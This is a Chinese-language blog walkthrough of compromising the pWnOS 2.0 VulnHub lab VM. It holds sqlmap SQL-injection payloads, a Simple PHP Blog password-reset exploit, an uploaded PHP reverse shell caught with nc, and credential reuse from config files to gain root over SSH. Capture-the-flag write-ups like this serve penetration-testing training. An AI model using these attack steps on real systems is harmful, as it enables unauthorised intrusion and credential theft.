vulnhub靶机渗透[pWnOS2.0-Pre-Release]

Posted on 2019-12-14 Edited on 2020-08-17 In vulnhub walkthrough Views: Word count in article: 2.4k Reading time ≈ 9 mins.

名称：pWnOS：2.0（预发布）
发布日期：2011年7月4日

下载：
Download: http://pwnos.com/files/pWnOS_v2.0.7z
Download (Mirror): https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z
Download (Torrent): https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z.torrent

描述：

pWnOS v2.0（预发布！）

目标：
root…赢！
关于：
pWnOS v2.0是一个Virutal机器映像，它托管一台服务器以进行实践渗透测试。它将测试您利用服务器的能力，并包含多个达到目标（根）的入口点。它是为与WMWare Workstation 7.0一起使用而设计的，但也可以与大多数其他虚拟机软件一起使用。

配置和设置：
将攻击平台配置为在10.10.10.0/24网络范围内
例如，将BackTrack 5网络适配器静态设置为IP地址为10.10.10.200且网络掩码为255.255.255.0。

VMWare的网络适配器设置为桥接网络适配器
您可能需要根据设置将VMWare的网络适配器更改为NAT或仅主机

服务器的IP静态设置为10.10.10.100

服务器的网络设置：
IP：10.10.10.100
网路遮罩：255.255.255.0
网关：10.10.10.15

漏洞：

不安全的文件处理
纯文本密码
重用凭证
SQL注入
不受限制地上传危险类型的文件

配置网络

对于白中白的小盆友，可能网络都配置不来，就按下面图片中的配置即可，然后测试网络可达性。

root@kali:~# ping 10.10.10.100
PING 10.10.10.100 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=64 time=0.223 ms
64 bytes from 10.10.10.100: icmp_seq=2 ttl=64 time=0.414 ms
64 bytes from 10.10.10.100: icmp_seq=3 ttl=64 time=0.342 ms
64 bytes from 10.10.10.100: icmp_seq=4 ttl=64 time=0.357 ms
64 bytes from 10.10.10.100: icmp_seq=5 ttl=64 time=0.416 ms
^C
--- 10.10.10.100 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4092ms
rtt min/avg/max/mdev = 0.223/0.350/0.416/0.070 ms

nice done!!!

信息收集

nmap伺候

22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|       httponly flag not set
|   /login/: 
|     PHPSESSID: 
|       httponly flag not set
|   /index/: 
|     PHPSESSID: 
|       httponly flag not set
|   /register/: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.100:80/login.php
|     Form id: 
|     Form action: login.php
|     
|     Path: http://10.10.10.100:80/register.php
|     Form id: 
|_    Form action: register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /blog/: Blog
|   /login.php: Possible admin folder
|   /login/: Login page
|   /info.php: Possible information file
|   /icons/: Potentially interesting folder w/ directory listing
|   /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
|   /index/: Potentially interesting folder
|   /info/: Potentially interesting folder
|_  /register/: Potentially interesting folder
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

来到登录口，发现有注入，直接sqlmap一波。

root@kali:~# sqlmap -r sqlmap.txt -D ch16 -T users --dump
        ___
       __H__                                                                                                                                                        
 ___ ___[)]_____ ___ ___  {1.3.12#stable}                                                                                                                           
|_ -| . [.]     | .'| . |                                                                                                                                           
|___|_  [']_|_|_|__,|  _|                                                                                                                                           
      |_|V...       |_|   http://sqlmap.org                                                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:56:36 /2019-12-15/

[05:56:36] [INFO] parsing HTTP request from 'sqlmap.txt'
[05:56:36] [INFO] resuming back-end DBMS 'mysql' 
[05:56:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: email=124123' OR NOT 3619=3619#&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=124123' AND (SELECT 1325 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1325=1325,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gsUK&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=124123' AND (SELECT 5062 FROM (SELECT(SLEEP(5)))bAlG)-- SXBw&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: email=124123' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170706a71,0x564e4f70794e7171465a644f695056686b6e54576e757163667a7476486252574f76717264665950,0x7170627171),NULL,NULL,NULL,NULL#&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE
---
[05:56:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[05:56:36] [INFO] fetching columns for table 'users' in database 'ch16'
[05:56:36] [INFO] used SQL query returns 8 entries
[05:56:36] [INFO] resumed: 'user_id','int(10) unsigned'
[05:56:36] [INFO] resumed: 'first_name','varchar(20)'
[05:56:36] [INFO] resumed: 'last_name','varchar(40)'
[05:56:36] [INFO] resumed: 'email','varchar(80)'
[05:56:36] [INFO] resumed: 'pass','char(40)'
[05:56:36] [INFO] resumed: 'user_level','tinyint(1) unsigned'
[05:56:36] [INFO] resumed: 'active','char(32)'
[05:56:36] [INFO] resumed: 'registration_date','datetime'
[05:56:36] [INFO] fetching entries for table 'users' in database 'ch16'                                                                                            
[05:56:36] [INFO] used SQL query returns 1 entry
[05:56:36] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: ch16
Table: users
[1 entry]
+---------+------------------------------------------+------------------+--------+-----------+------------+------------+---------------------+
| user_id | pass                                     | email            | active | last_name | first_name | user_level | registration_date   |
+---------+------------------------------------------+------------------+--------+-----------+------------+------------+---------------------+
| 1       | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | admin@isints.com | NULL   | Privett   | Dan        | 0          | 2011-05-07 17:27:01 |
+---------+------------------------------------------+------------------+--------+-----------+------------+------------+---------------------+

[05:56:39] [INFO] table 'ch16.users' dumped to CSV file '/root/.sqlmap/output/10.10.10.100/dump/ch16/users.csv'
[05:56:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.100'

[*] ending @ 05:56:39 /2019-12-15/

sha1加密的hash值c2c4b4e51d9e23c02c15702c136c3e950ba9a4af解密得到killerbeesareflying,使用邮箱和该密码登录没有发现任何内容

dirb目录扫一波

root@kali:~# dirb http://10.10.10.100/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 15 05:59:36 2019
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)                                                                                                                   
==> DIRECTORY: http://10.10.10.100/blog/                                                                                                                           
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)                                                                                                                 
==> DIRECTORY: http://10.10.10.100/includes/                                                                                                                       
+ http://10.10.10.100/index (CODE:200|SIZE:854)                                                                                                                    
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)                                                                                                                
+ http://10.10.10.100/info (CODE:200|SIZE:50175)                                                                                                                   
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)                                                                                                               
+ http://10.10.10.100/login (CODE:200|SIZE:1174)                                                                                                                   
+ http://10.10.10.100/register (CODE:200|SIZE:1562)                                                                                                                
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)                                                                                                            
                                                                                                                                                                   
---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)                                                                                                                   
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)                                                                                                               
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)                                                                                                            
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)                                                                                                              
==> DIRECTORY: http://10.10.10.100/blog/config/                                                                                                                    
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5918)                                                                                                            
==> DIRECTORY: http://10.10.10.100/blog/content/                                                                                                                   
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)                                                                                                                
==> DIRECTORY: http://10.10.10.100/blog/docs/                                                                                                                      
==> DIRECTORY: http://10.10.10.100/blog/flash/                                                                                                                     
==> DIRECTORY: http://10.10.10.100/blog/images/                                                                                                                    
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)                                                                                                              
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)                                                                                                          
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)                                                                                                                  
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)                                                                                                              
==> DIRECTORY: http://10.10.10.100/blog/interface/                                                                                                                 
==> DIRECTORY: http://10.10.10.100/blog/languages/                                                                                                                 
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5667)                                                                                                              
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)                                                                                                                
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)                                                                                                               
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)                                                                                                                
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)                                                                                                                
==> DIRECTORY: http://10.10.10.100/blog/scripts/                                                                                                                   
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4950)                                                                                                             
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)                                                                                                                 
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)                                                                                                                
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5309)                                                                                                              
==> DIRECTORY: http://10.10.10.100/blog/themes/                                                                                                                    
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)                                                                                                             
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

getshell

扫到blog目录,访问http://10.10.10.100/blog/右键查看源码发现是Simple PHP Blog 0.4.0版本网上搜索exploit，发现有一大堆的exp

exploitdb有几个符合要求的漏洞利用程序，一个Metasploit模块以及决定使用的基于Perl的漏洞利用程序,perl脚本下载地址:

使用该poc修改blog的用户名和密码

root@kali:~# ./SimplePHPBlog.pl -h http://10.10.10.100/blog/ -e 3 -U admin -P admin
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)

成功修改,admin/admin成功登录

找到上传点上传php reverse shell

可以直接上传.php后缀的文件

然后访问php-reverse-shell.php,kali使用nc -lvp 5566命令监听，成功返回shell

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
10.10.10.100: inverse host lookup failed: Host name lookup failure
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 34832
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 16:07:45 up  2:14,  0 users,  load average: 0.03, 0.03, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$

权限提升

使用以下命令来改善shell

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@web:/$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@web:/$ id^^^H^H^H^H^H^H^H

www-data@web:/$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@web:/$ whoami

www-data
www-data@web:/$ ls

bin   dev  home        lib    lost+found  mnt  proc  sbin     srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  selinux  sys  usr  vmlinuz

在/var/www目录下寻找数据库配置文件的用户名和密码

$ pwd
/var/www
$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>$

试了下这个密码，发现是错的，但是在/var/目录下还发现了一个mysqli_connect.php文件

$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

www-data@web:/var$ mysql -uroot -proot@ISIntS

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 9823
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show  databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql>

发现/var目录下的配置文件中的密码可以正常连接mysql数据库，再使用该用户名和密码连接ssh

root@kali:~# ssh root@10.10.10.100
root@10.10.10.100's password: 
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Sun Oct 20 16:31:46 EDT 2019

  System load:  0.0               Processes:           81
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 23%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sun Oct 20 16:18:11 2019 from 10.10.10.128
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# whoami
root

成功，挑战完成！！！够牛批，帅掉渣！！！

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…